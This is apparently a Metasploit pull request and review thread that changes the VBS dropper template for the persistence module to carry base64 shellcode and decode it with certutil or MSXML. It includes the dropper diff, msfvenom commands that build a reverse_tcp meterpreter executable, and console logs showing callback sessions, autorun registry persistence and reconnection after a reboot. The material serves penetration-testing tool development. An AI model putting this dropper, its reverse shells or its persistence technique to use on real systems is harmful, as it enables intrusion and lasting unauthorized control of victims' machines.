### PR TITLE
Send base64ed shellcode and decode with certutil

### PR DESCRIPTION
**Pull request by f7b053223a9e**
This is a fix for #6053 making it possible to persist in non-ascii environments with the vbs dropper.

### CODE REVIEW

File: data/templates/scripts/to_exe.vbs.template [hunk 1]
```diff
@@ -1,26 +1,27 @@
...
-	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	For i = 1 to Len(%{var_shellcode}) Step 2
-	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
-	Next
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
+	%{var_stream}.Write %{var_shellcode}
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
```
Comment (OJ) [inline data/templates/scripts/to_exe.vbs.template]: Can you confirm that `certutil` is always in the `%PATH%`? Or should steps be taken to ensure that the exe is located?

File: data/templates/scripts/to_exe.vbs.template [hunk 2]
```diff
@@ -1,26 +1,27 @@
...
 	%{var_shell}.run %{var_tempexe}, 0, true
-	%{var_obj}.DeleteFile(%{var_tempexe})
+    %{var_obj}.DeleteFile(%{var_tempexe})
```
Comment (OJ) [inline data/templates/scripts/to_exe.vbs.template]: Minor indenting issue.

**Comment by f7b053223a9e** [comment]
Win7 32bit
image

Win7 64bit
image

Unless you purposely remove C:\Windows\System32 it should always be in the %PATH%.
I only have a windows7 systems available at the moment so I can't say for sure for other systems.

**Comment by bcook-r7** [comment]
Certutil.exe is available on Windows 2003, but it does not appear to be present in the PATH on my copy of Windows XP SP3.

**Comment by bcook-r7** [comment]
It appears you need the Windows 2003 Administration pack installed on XP to use this. https://support.microsoft.com/en-us/kb/934576

Maybe leveraging the MSXML decoder is more portable? http://operatingquadrant.com/2009/09/11/vbs-decoding-base64-strings-in-10-lines-of-code/

**Comment by f7b053223a9e** [comment]
Tested in `WindowsXP Home 32bit SP3` and `Windows7 Home 32bit`

**Comment by bcook-r7** [comment]
Cool, thanks for the update to MSXML - will have to give this another spin.

**Comment by bwatters-r7** [comment]
While testing this, I'm getting about a 50% success rate on x86 Windows XP Pro.  That said, the problems do not appear related to the encoding.  When it fails, it fails because the registry key does not get added properly, even though the persistence script is created and uploaded properly.  If I launch the vbs file manually on the remote host, I get a callback just fine.

**Comment by bwatters-r7** [comment]
# Testing
## Windows 7 x64 Professional
Current Metasploit:
```
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(handler) > run

[*] Started reverse TCP handler on <msf_IP>:4545 
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4545 -> <target_IP>:49256) at 2016-07-28 11:01:08 -0700

meterpreter > run persistence -A -U -i 60 -r <msf_IP> -p 54321
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/bwatters/.msf4/logs/persistence/WIN-ALPF3DCUCC2_20160728.0203/WIN-ALPF3DCUCC2_20160728.0203.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=<msf_IP> LPORT=54321
[*] Persistent agent script is 148480 bytes long
[+] Persistent Script written to C:\Users\bwatters\AppData\Local\Temp\HfNxZlI.vbs
[*] Starting connection handler at port 54321 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\Users\bwatters\AppData\Local\Temp\HfNxZlI.vbs
[+] Agent executed with PID 2720
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LFaBvgHYYO
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\LFaBvgHYYO
meterpreter > 
```

```
bwatters@ubuntu:~/rapid7/metasploit-framework$ ./msfvenom -platform windows -a x86 -p windows/meterpreter/reverse_tcp -f exe lhost=<msf_IP> lport=4545 -o test.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Saved as: test.exe
```

With Fix:
```
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > run

[*] Started reverse TCP handler on <msf_IP>:4545 
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4545 -> <target_IP>:49252) at 2016-07-28 11:23:11 -0700

meterpreter > sysinfo
Computer        : WIN-ALPF3DCUCC2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > run persistence -A -U -i 60 -r <msf_IP> -p 4646
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/bwatters/.msf4/logs/persistence/WIN-ALPF3DCUCC2_20160728.2349/WIN-ALPF3DCUCC2_20160728.2349.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=<msf_IP> LPORT=4646
[*] Persistent agent script is 99659 bytes long
[+] Persistent Script written to C:\Users\bwatters\AppData\Local\Temp\QoKdSIYQPNaa.vbs
[*] Starting connection handler at port 4646 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\Users\bwatters\AppData\Local\Temp\QoKdSIYQPNaa.vbs
[+] Agent executed with PID 1000
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qdbhVckeNvamdM
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qdbhVckeNvamdM
meterpreter > [*] Meterpreter session 2 opened (<msf_IP>:4646 -> <target_IP>:49253) at 2016-07-28 11:23:52 -0700
background 
[*] Backgrounding session 1...
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                 Connection
  --  ----                   -----------                                 ----------
  1   meterpreter x86/win32  WIN-ALPF3DCUCC2\bwatters @ WIN-ALPF3DCUCC2  <msf_IP>:4545 -> <target_IP>:49252 (<target_IP>)
  2   meterpreter x86/win32  WIN-ALPF3DCUCC2\bwatters @ WIN-ALPF3DCUCC2  <msf_IP>:4646 -> <target_IP>:49253 (<target_IP>)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN-ALPF3DCUCC2
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 
```

**Comment by bwatters-r7** [comment]
# Testing
## Windows XP Pro x86
(I'm too lazy to install a Japanese language version of XP to verify behavior after seeing it in Win7 and posts)
```
msf exploit(handler) > run

[*] Started reverse TCP handler on <msf_IP>:4545 
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to <target_IP>
[*] Meterpreter session 4 opened (<msf_IP>:4545 -> <target_IP>:1037) at 2016-07-28 11:53:23 -0700

meterpreter > run persistence -A -U -i 60 -r <msf_IP> -p 4747
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/bwatters/.msf4/logs/persistence/TEST-8343845B47_20160728.5336/TEST-8343845B47_20160728.5336.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=<msf_IP> LPORT=4747
[*] Persistent agent script is 99689 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hKOhXfn.vbs
[*] Starting connection handler at port 4747 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hKOhXfn.vbs
[+] Agent executed with PID 216
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qshDzmmkElZL
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qshDzmmkElZL
meterpreter > [*] Meterpreter session 5 opened (<msf_IP>:4747 -> <target_IP>:1038) at 2016-07-28 11:53:38 -0700

meterpreter > background
[*] Backgrounding session 4...
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  4   meterpreter x86/win32  TEST-8343845B47\Administrator @ TEST-8343845B47  <msf_IP>:4545 -> <target_IP>:1037 (<target_IP>)
  5   meterpreter x86/win32  TEST-8343845B47\Administrator @ TEST-8343845B47  <msf_IP>:4747 -> <target_IP>:1038 (<target_IP>)

msf exploit(handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : TEST-8343845B47
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 4...
msf exploit(handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : TEST-8343845B47
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 
```

AFTER REBOOT....

```
msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(handler) > set lport 4747
lport => 4747
msf exploit(handler) > run

[*] Started reverse TCP handler on <msf_IP>:4747 
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4747 -> <target_IP>:1025) at 2016-07-28 11:59:52 -0700

meterpreter > sysinfo
Computer        : TEST-8343845B47
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > 
```

**Comment by bwatters-r7** [comment]
# Release Notes
This PR changes the encoding of payloads by the vbs file of the persistence module from a texty-based encoding to a base64 encoding.  In the case of unicode-dependent operating systems, the resulting text encoding could/does render the payload invalid.

**Comment by bwatters-r7** [comment]
Also, slightly hijacked this to correct a few of the instances of "persistance" to "persistence."

**Pull request merged**